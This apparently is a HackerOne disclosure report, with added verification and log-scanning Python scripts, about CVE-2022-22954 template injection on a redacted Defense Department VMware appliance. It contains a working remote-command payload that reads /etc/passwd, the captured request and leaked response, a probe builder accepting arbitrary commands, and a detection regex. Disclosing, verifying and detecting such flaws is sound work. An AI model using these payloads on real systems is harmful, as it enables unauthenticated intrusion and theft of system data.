U.S. Dept Of Defense: ██████████ vulnerable to CVE-2022-22954

HackerOne report 1537543 (hackeroneFulldashH1:1537543)
Reported by fulldash via hackerone.com, 2022-04-11 15:17:31
EPSS: 0.974 (High), percentile 99.9%

I found that one of the targets belonging to the DoD is vulnerable to CVE-2022-22954, where an attacker may be able to execute malicious code; escalation to remote code execution is also possible.

Technical Summary:

CVE-2022-22954 is a server-side template injection (SSTI) vulnerability in VMware Workspace ONE Access and Identity Manager, rated CVSSv3 9.8. An unauthenticated attacker with network access can exploit it by sending a specially crafted request to a vulnerable instance. In this report the injection point is the deviceUdid parameter of /catalog-portal/ui/oauth/verify: the value is rendered through a FreeMarker template, so the expression ${"freemarker.template.utility.Execute"?new()("...")} instantiates FreeMarker's Execute utility and runs the given shell command on the appliance. Successful exploitation results in remote code execution.

Vulnerable URL:

https://████/catalog-portal/ui/oauth/verify?error=&deviceUdid=%24{"freemarker.template.utility.Execute"%3Fnew()("cat %2Fetc%2Fpasswd")}

Impact

The impact of server-side template injection is generally critical: it results in remote code execution and full control of the back-end server. Even without code execution, the attacker may be able to read sensitive data on the server, as the /etc/passwd read in this report demonstrates.

System Host(s)

███████

Affected Product(s) and Version(s)

VMware Workspace ONE Access (Identity Manager)

CVE Numbers

CVE-2022-22954

Steps to Reproduce

  • Visit the vulnerable URL https://████ and intercept the request in Burp Suite.
  • Append the following path and query: /catalog-portal/ui/oauth/verify?error=&deviceUdid=%24%7b%22%66%72%65%65%6d%61%72%6b%65%72%2e%74%65%6d%70%6c%61%74%65%2e%75%74%69%6c%69%74%79%2e%45%78%65%63%75%74%65%22%3f%6e%65%77%28%29%28%22%63%61%74%20%2f%65%74%63%2f%70%61%73%73%77%64%22%29%7d (this is the fully percent-encoded form of the payload shown under "Vulnerable URL" above) and inspect the response: it contains the contents of **/etc/passwd**.

Request:

GET /catalog-portal/ui/oauth/verify?error=&deviceUdid=%24%7b%22%66%72%65%65%6d%61%72%6b%65%72%2e%74%65%6d%70%6c%61%74%65%2e%75%74%69%6c%69%74%79%2e%45%78%65%63%75%74%65%22%3f%6e%65%77%28%29%28%22%63%61%74%20%2f%65%74%63%2f%70%61%73%73%77%64%22%29%7d HTTP/1.1
Host: █████████
Cookie: LOGIN_XSRF=NSlYKinVNwgOtuT; JSESSIONID=A86B60C5FD0B58346764D1FB01DAF155
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:99.0) Gecko/20100101 Firefox/99.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Upgrade-Insecure-Requests: 1
Sec-Fetch-Dest: document
Sec-Fetch-Mode: navigate
Sec-Fetch-Site: none
Sec-Fetch-User: ?1
Cache-Control: max-age=0
Te: trailers
Connection: close

Response:

HTTP/1.1 400 
Vary: Origin
Vary: Access-Control-Request-Method
Vary: Access-Control-Request-Headers
Set-Cookie: EUC_XSRF_TOKEN=6386e149-ff55-4a34-b474-30e6c0c62299; Path=/catalog-portal; Secure
Cache-Control: no-cache,private
X-Content-Type-Options: nosniff
X-XSS-Protection: 1; mode=block
Strict-Transport-Security: max-age=31536000 ; includeSubDomains
X-Frame-Options: SAMEORIGIN
Content-Type: text/html;charset=UTF-8
Content-Language: en-US
Date: Mon, 11 Apr 2022 15:03:40 GMT
Connection: close
Content-Length: 3576

<!DOCTYPE HTML>
<html xmlns="http://www.w3.org/1999/html">
<head>
    <title>Error Page</title>
    <meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=1"/>
    <meta http-equiv="X-UA-Compatible" content="IE=edge"/>
    <style>
        body {
            background: #465361;
        }

        .error-container {
            position: fixed;
            top: 50%;
            left: 50%;
            transform: translate(-50%, -50%);
            -ms-transform: translate(-50%, -50%);
            text-align: center;
            width: 25%;
            background-color: #fff;
            padding: 20px;
            box-shadow: 0 3px 2px -2px rgba(0, 0, .5, 0.35);
            border-radius: 4px;
        }

        .error-img-container svg {
            width: 40px;
        }

        .error-text-heading {
            font-weight: bold;
            padding-top: 5px;
            padding-bottom: 10px;
        }

        .error-text-container a {
            text-decoration: none;
        }
    </style>
</head>

<body>
<div>
    <div>
        <svg id="icon-warning-big" xmlns="http://www.w3.org/2000/svg" width="32" height="32" viewBox="0 0 32 32">
            <path d="M28.48,24.65,17.64,5.88a1.46,1.46,0,0,0-1.28-.74h0a1.46,1.46,0,0,0-1.28.74L4.25,24.64a1.48,1.48,0,0,0,1.28,2.22H27.2a1.48,1.48,0,0,0,1.28-2.21Zm-1.07.86a.24.24,0,0,1-.21.12H5.53a.24.24,0,0,1-.21-.37L16.15,6.49a.24.24,0,0,1,.21-.12h0a.24.24,0,0,1,.21.12L27.41,25.26A.23.23,0,0,1,27.41,25.51Z"
                  fill="#991700" stroke-width="0"/>
            <circle cx="16.36" cy="13.53" r="0.92" fill="#f38b00" stroke-width="0"/>
            <path d="M16.36,16.43a.62.62,0,0,0-.62.62v5.55a.62.62,0,0,0,1.23,0V17A.62.62,0,0,0,16.36,16.43Z"
                  fill="#991700" stroke-width="0"/>
        </svg>
    </div>
    <div>Request Failed</div>
    <div>
        <p>Please contact your IT Administrator.</p>
        <a href="/catalog-portal/ui/logout?error=&deviceUdid=$%7B%22freemarker.template.utility.Execute%22?new()(%22cat%20/etc/passwd%22)%7D">Sign Out</a>
    </div>
</div>
</body>
<script>
    if (console && console.log) {
        console.log("auth.context.invalid");
        console.log("Authorization context is not valid. Login request  received with tenant code: ███████, device id: root:x:0:0:root:/root:/bin/bash\nbin:x:1:1:bin:/dev/null████████
    }
</script>
</html>
  • As you can see in the above response, the output of cat /etc/passwd is reflected in the "device id" field of the error page's console.log message. The command output, not the literal ${...} expression, came back, which shows the template was evaluated server-side.
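The verification the steps above perform by hand, as an added example written for this page (not code from the report or from VMware): it builds the request target in the report's form, checks that it decodes to the same bytes as the report's fully hex-encoded URL, and parses the reflected "device id" value out of the error page. The marker-echo probe, the function names and the sample response body are this example's own assumptions; the sample is modelled on the report's response shape with a fictitious tenant code, and the live probe must only be pointed at hosts you are authorised to test.

```python
import re
import secrets
import urllib.error
import urllib.request
from typing import Optional
from urllib.parse import quote, unquote

# Endpoint, parameter and payload shape are taken from the report; everything
# else here (function names, the marker-echo probe) is this example's own.
VERIFY_PATH = "/catalog-portal/ui/oauth/verify"
REPORT_PATH = (
    VERIFY_PATH
    + "?error=&deviceUdid=%24%7b%22%66%72%65%65%6d%61%72%6b%65%72%2e%74%65%6d%70%6c"
    "%61%74%65%2e%75%74%69%6c%69%74%79%2e%45%78%65%63%75%74%65%22%3f%6e%65%77%28%29"
    "%28%22%63%61%74%20%2f%65%74%63%2f%70%61%73%73%77%64%22%29%7d"
)


def freemarker_exec_expr(cmd: str) -> str:
    """FreeMarker expression from the report: instantiate Execute and run cmd."""
    return '${"freemarker.template.utility.Execute"?new()("%s")}' % cmd


def build_probe_path(cmd: str) -> str:
    """Path + query in the report's form. quote(safe="") encodes every reserved
    character, so the result decodes to the same bytes as REPORT_PATH."""
    return "%s?error=&deviceUdid=%s" % (VERIFY_PATH, quote(freemarker_exec_expr(cmd), safe=""))


def same_decoded_target(a: str, b: str) -> bool:
    """Compare two request targets after percent-decoding."""
    return unquote(a) == unquote(b)


# The vulnerable host echoes the evaluated deviceUdid into a console.log string
# in its error page; the value is a JS string literal, so newlines arrive as \n.
DEVICE_ID_RE = re.compile(r'device id: (.*?)(?:"\);|$)', re.M)


def reflected_device_id(body: str) -> Optional[str]:
    m = DEVICE_ID_RE.search(body)
    if m is None:
        return None
    return m.group(1).replace("\\n", "\n")


def probe_reflects(body: str, marker: str) -> bool:
    """True only when the echoed marker came back on its own. A host that
    reflects the unevaluated template text still contains the marker inside the
    ${...} expression, so a plain substring test would give a false positive."""
    value = reflected_device_id(body)
    return value is not None and value.strip() == marker


def send_probe(base_url: str, timeout: float = 10.0) -> bool:
    """Send the marker-echo probe to base_url (e.g. https://host) and report
    whether the template was evaluated. Only for hosts you are authorised to test."""
    marker = secrets.token_hex(8)
    url = base_url.rstrip("/") + build_probe_path("echo " + marker)
    req = urllib.request.Request(url, headers={"User-Agent": "cve-2022-22954-check"})
    try:
        with urllib.request.urlopen(req, timeout=timeout) as resp:
            body = resp.read().decode("utf-8", "replace")
    except urllib.error.HTTPError as err:
        # The report's host answered 400 and still reflected the output, so the
        # error body is the interesting one; urlopen raises on 4xx.
        body = err.read().decode("utf-8", "replace")
    return probe_reflects(body, marker)


# Constructed response excerpt modelled on the report's error page (not the
# captured response itself), with a fictitious tenant code.
SAMPLE_VULNERABLE_BODY = (
    '<script>\n'
    '    if (console && console.log) {\n'
    '        console.log("auth.context.invalid");\n'
    '        console.log("Authorization context is not valid. Login request received '
    'with tenant code: example, device id: root:x:0:0:root:/root:/bin/bash\\n'
    'bin:x:1:1:bin:/dev/null");\n'
    '    }\n'
    '</script>\n'
)


if __name__ == "__main__":
    import sys
    print("vulnerable" if send_probe(sys.argv[1]) else "not reflected / inconclusive")
```

Echoing a random marker instead of reading /etc/passwd gives an unambiguous result without pulling system files off the target; a host that answers with the marker alone evaluated the expression, while anything else (the raw ${...} text, an empty device id, no console.log at all) is inconclusive rather than proof of a fix.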

Suggested Mitigation/Remediation Actions

Update the instance to a version fixed per VMware's advisory VMSA-2022-0011, which covers CVE-2022-22954. Where the patch cannot be applied immediately, apply VMware's published workaround for the advisory and restrict network access to the appliance until it is patched.
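Beyond patching, defenders will want to know whether this payload was ever sent to their appliances. The following is an added example written for this page, not part of the report: it scans web-server access logs for FreeMarker expressions in query parameters, decoding repeatedly so the report's fully hex-encoded form and a double-encoded variant are both caught. The log lines are constructed samples (client IPs, timestamps and the double-encoded request are invented); the report does not show whether the appliance decodes a parameter twice, so that variant is flagged as an attempt regardless of whether it would have been evaluated.

```python
import re
from urllib.parse import parse_qs, unquote, urlsplit

# Request-line extractor for combined/common log format.
REQUEST_LINE = re.compile(r'"(?P<method>[A-Z]+) (?P<target>\S+) HTTP/[\d.]+"')

# A FreeMarker interpolation that instantiates a class (the report's
# "freemarker.template.utility.Execute"?new() shape) or names that utility package.
FREEMARKER_PATTERN = re.compile(r"\$\{.*?(\?new\(|freemarker\.template\.utility)", re.I | re.S)

# Constructed sample lines (not from the report): a benign verify call, the
# report's fully hex-encoded payload, an invented double-encoded variant, and an
# unrelated request.
SAMPLE_LOG = """\
10.0.0.5 - - [11/Apr/2022:15:01:02 +0000] "GET /catalog-portal/ui/oauth/verify?error=&deviceUdid=7f3c2d1e HTTP/1.1" 200 512
10.0.0.9 - - [11/Apr/2022:15:03:40 +0000] "GET /catalog-portal/ui/oauth/verify?error=&deviceUdid=%24%7b%22%66%72%65%65%6d%61%72%6b%65%72%2e%74%65%6d%70%6c%61%74%65%2e%75%74%69%6c%69%74%79%2e%45%78%65%63%75%74%65%22%3f%6e%65%77%28%29%28%22%63%61%74%20%2f%65%74%63%2f%70%61%73%73%77%64%22%29%7d HTTP/1.1" 400 3576
10.0.0.9 - - [11/Apr/2022:15:04:11 +0000] "GET /catalog-portal/ui/oauth/verify?error=&deviceUdid=%2524%257B%2522freemarker.template.utility.Execute%2522%253Fnew()(%2522id%2522)%257D HTTP/1.1" 400 3576
10.0.0.5 - - [11/Apr/2022:15:05:00 +0000] "GET /SAAS/auth/login HTTP/1.1" 200 1024
"""


def fully_decode(value: str, rounds: int = 3) -> str:
    """Percent-decode until the value stops changing, so double-encoded payloads
    are not missed; rounds bounds the work on hostile input."""
    for _ in range(rounds):
        decoded = unquote(value)
        if decoded == value:
            break
        value = decoded
    return value


def suspicious_params(target: str) -> dict:
    """Map parameter name -> decoded value for every query parameter carrying a
    FreeMarker expression. parse_qs already strips one encoding layer."""
    query = urlsplit(target).query
    hits = {}
    for name, values in parse_qs(query, keep_blank_values=True).items():
        for value in values:
            decoded = fully_decode(value)
            if FREEMARKER_PATTERN.search(decoded):
                hits[name] = decoded
    return hits


def scan_log(text: str):
    """Return (client, request target, hits) for each line carrying a payload."""
    findings = []
    for line in text.splitlines():
        m = REQUEST_LINE.search(line)
        if m is None:
            continue
        hits = suspicious_params(m.group("target"))
        if hits:
            findings.append((line.split()[0], m.group("target"), hits))
    return findings


if __name__ == "__main__":
    for client, target, hits in scan_log(SAMPLE_LOG):
        print(client, target.split("?")[0], hits)
```

Matching on the decoded value rather than on the raw request line is the point: a signature for the literal string `freemarker.template.utility.Execute` would miss the report's own request, in which every letter of that name is percent-encoded.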